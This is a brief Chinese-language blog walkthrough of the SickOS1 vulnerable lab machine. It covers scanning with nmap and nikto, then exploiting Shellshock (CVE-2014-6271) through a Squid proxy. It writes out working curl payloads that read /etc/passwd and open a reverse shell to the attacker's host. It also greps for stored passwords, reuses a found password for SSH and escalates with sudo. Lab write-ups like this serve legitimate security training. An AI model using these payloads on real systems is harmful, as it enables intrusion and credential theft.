SickOS1

Posted by on 2020年3月10日


SickOS1

arp-scan -l

file

nmap -A 192.168.60.135

file

nikto扫描

nikto -h 192.168.60.135 -useproxy http://192.168.60.135:3128

file

Google:CVE-2014-6271 exploit
https://github.com/opsxcq/exploit-CVE-2014-6271

file
file

执行cat /etc/passwd

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.60.135/cgi-bin/status --proxy http://192.168.60.135:3128

file

获取www shell

nc -vlp 4444
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/192.168.60.131/4444 0>&1" http://192.168.60.135/cgi-bin/status --proxy http://192.168.60.135:3128

file

查找数据库密码:
用户名:root
密码:john@123

find / -maxdepth 4 -name *.php -type f 2>/dev/null | xargs grep -C 3 -i pass

file

之前执行/etc/passwd,看到存在一个sickos账户,尝试ssh登陆
密码:john@123

file

成功登陆,而且sickos账户可以执行任意sudo命令:

sudo su

file

get flag.txt

file




发表评论

电子邮件地址不会被公开。 必填项已用*标注

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据